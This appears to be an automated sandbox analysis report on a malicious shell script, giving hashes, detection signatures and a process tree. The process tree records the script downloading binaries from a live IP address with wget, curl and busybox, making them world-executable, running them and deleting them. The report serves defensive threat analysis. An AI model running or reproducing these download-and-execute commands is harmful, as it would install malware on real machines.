Analysis
- max time kernel: 25s
- max time network: 66s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 21/11/2024, 07:02
Static task: static1
Behavioral task: behavioral1
  Sample: 9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
  Resource: ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2
  Sample: 9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
  Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3
  Sample: 9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
  Resource: debian9-mipsbe-20240729-en
Behavioral task: behavioral4
  Sample: 9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
  Resource: debian9-mipsel-20240226-en
General
- Target: 9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
- Size: 10KB
- MD5: a1defdb85efc4f43f3026f633f9d8642
- SHA1: 50c5a077d2f6661aae89e985d3ed38d1c6678db1
- SHA256: 9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2
- SHA512: ccce629290ff01417dcfcaa9313b1d4fe996f2d0131a5e211a0d9b41c81883bc0aced8f92fce2e96cc8216fcd2be2d5c1703f77c54706880e444a2bbe868b459
- SSDEEP: 192:hhYH7jooSYSyovzbEXvHC+OU1RZEEhWsRH7jooECSyovzkXvHC+V1RZEEs:Pp1tOo
Malware Config
Signatures
- File and Directory Permissions Modification  1 TTPs  13 IoCs
  Adversaries may modify file or directory permissions to evade defenses.
  pid  Process
  817  chmod
  835  chmod
  684  chmod
  699  chmod
  723  chmod
  748  chmod
  780  chmod
  829  chmod
  758  chmod
  797  chmod
  803  chmod
  810  chmod
  823  chmod
- Executes dropped EXE  13 IoCs
  ioc                                       pid  Process
  /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0   685  tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe   700  cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz   725  e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne   749  tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo   760  EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw   782  UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8   798  nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ   804  zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO   811  UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ   818  JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG   824  7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc   830  xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a   836  0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
- Checks CPU configuration  1 TTPs  13 IoCs
  Checks CPU information which indicates whether the system is a virtual machine.
  description              ioc            Process
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
  File opened for reading  /proc/cpuinfo  curl
- Reads runtime system information  26 IoCs
  description              ioc                             Process
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/self/auxv                curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
- Writes file to tmp directory  13 IoCs
  Malware often drops required files in the /tmp directory.
  description                   ioc                                       Process
  File opened for modification  /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a   curl
  File opened for modification  /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0   curl
  File opened for modification  /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe   curl
  File opened for modification  /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo   curl
  File opened for modification  /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw   curl
  File opened for modification  /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ   curl
  File opened for modification  /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ   curl
  File opened for modification  /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc   curl
  File opened for modification  /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz   curl
  File opened for modification  /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne   curl
  File opened for modification  /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8   curl
  File opened for modification  /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO   curl
  File opened for modification  /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG   curl
Processes (PID, image, command line, triggered signatures in brackets; child processes indented)
- PID 652  /tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh  /tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
  - PID 654  /bin/rm  /bin/rm bins.sh
  - PID 660  /usr/bin/wget  wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  - PID 675  /usr/bin/curl  curl -O http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - PID 682  /bin/busybox  /bin/busybox wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  - PID 684  /bin/chmod  chmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0  [File and Directory Permissions Modification]
  - PID 685  /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0  ./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0  [Executes dropped EXE]
  - PID 686  /bin/rm  rm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  - PID 687  /usr/bin/wget  wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  - PID 690  /usr/bin/curl  curl -O http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - PID 693  /bin/busybox  /bin/busybox wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  - PID 699  /bin/chmod  chmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe  [File and Directory Permissions Modification]
  - PID 700  /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe  ./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe  [Executes dropped EXE]
  - PID 702  /bin/rm  rm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  - PID 703  /usr/bin/wget  wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  - PID 710  /usr/bin/curl  curl -O http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - PID 717  /bin/busybox  /bin/busybox wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  - PID 723  /bin/chmod  chmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz  [File and Directory Permissions Modification]
  - PID 725  /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz  ./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz  [Executes dropped EXE]
  - PID 726  /bin/rm  rm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  - PID 727  /usr/bin/wget  wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  - PID 734  /usr/bin/curl  curl -O http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - PID 743  /bin/busybox  /bin/busybox wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  - PID 748  /bin/chmod  chmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne  [File and Directory Permissions Modification]
  - PID 749  /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne  ./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne  [Executes dropped EXE]
  - PID 750  /bin/rm  rm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  - PID 751  /usr/bin/wget  wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  - PID 753  /usr/bin/curl  curl -O http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - PID 754  /bin/busybox  /bin/busybox wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  - PID 758  /bin/chmod  chmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo  [File and Directory Permissions Modification]
  - PID 760  /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo  ./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo  [Executes dropped EXE]
  - PID 761  /bin/rm  rm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  - PID 762  /usr/bin/wget  wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  - PID 768  /usr/bin/curl  curl -O http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - PID 775  /bin/busybox  /bin/busybox wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  - PID 780  /bin/chmod  chmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw  [File and Directory Permissions Modification]
  - PID 782  /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw  ./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw  [Executes dropped EXE]
  - PID 784  /bin/rm  rm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  - PID 785  /usr/bin/wget  wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  - PID 792  /usr/bin/curl  curl -O http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - PID 796  /bin/busybox  /bin/busybox wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  - PID 797  /bin/chmod  chmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c8  [File and Directory Permissions Modification]
  - PID 798  /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8  ./nZK2byWknzW1gXWixRxIyczawUsL7rR9c8  [Executes dropped EXE]
  - PID 799  /bin/rm  rm nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  - PID 800  /usr/bin/wget  wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  - PID 801  /usr/bin/curl  curl -O http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - PID 802  /bin/busybox  /bin/busybox wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  - PID 803  /bin/chmod  chmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ  [File and Directory Permissions Modification]
  - PID 804  /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ  ./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ  [Executes dropped EXE]
  - PID 805  /bin/rm  rm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  - PID 806  /usr/bin/wget  wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  - PID 807  /usr/bin/curl  curl -O http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - PID 808  /bin/busybox  /bin/busybox wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  - PID 810  /bin/chmod  chmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO  [File and Directory Permissions Modification]
  - PID 811  /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO  ./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO  [Executes dropped EXE]
  - PID 812  /bin/rm  rm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  - PID 813  /usr/bin/wget  wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  - PID 815  /usr/bin/curl  curl -O http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - PID 816  /bin/busybox  /bin/busybox wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  - PID 817  /bin/chmod  chmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ  [File and Directory Permissions Modification]
  - PID 818  /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ  ./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ  [Executes dropped EXE]
  - PID 819  /bin/rm  rm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  - PID 820  /usr/bin/wget  wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  - PID 821  /usr/bin/curl  curl -O http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - PID 822  /bin/busybox  /bin/busybox wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  - PID 823  /bin/chmod  chmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG  [File and Directory Permissions Modification]
  - PID 824  /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG  ./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG  [Executes dropped EXE]
  - PID 825  /bin/rm  rm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  - PID 826  /usr/bin/wget  wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  - PID 827  /usr/bin/curl  curl -O http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - PID 828  /bin/busybox  /bin/busybox wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  - PID 829  /bin/chmod  chmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc  [File and Directory Permissions Modification]
  - PID 830  /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc  ./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc  [Executes dropped EXE]
  - PID 831  /bin/rm  rm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  - PID 832  /usr/bin/wget  wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  - PID 833  /usr/bin/curl  curl -O http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - PID 834  /bin/busybox  /bin/busybox wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  - PID 835  /bin/chmod  chmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a  [File and Directory Permissions Modification]
  - PID 836  /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a  ./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a  [Executes dropped EXE]
  - PID 837  /bin/rm  rm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  - PID 838  /usr/bin/wget  wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 153B
  MD5: 998368d7c95ea4293237f2320546e440
  SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
  SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
  SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97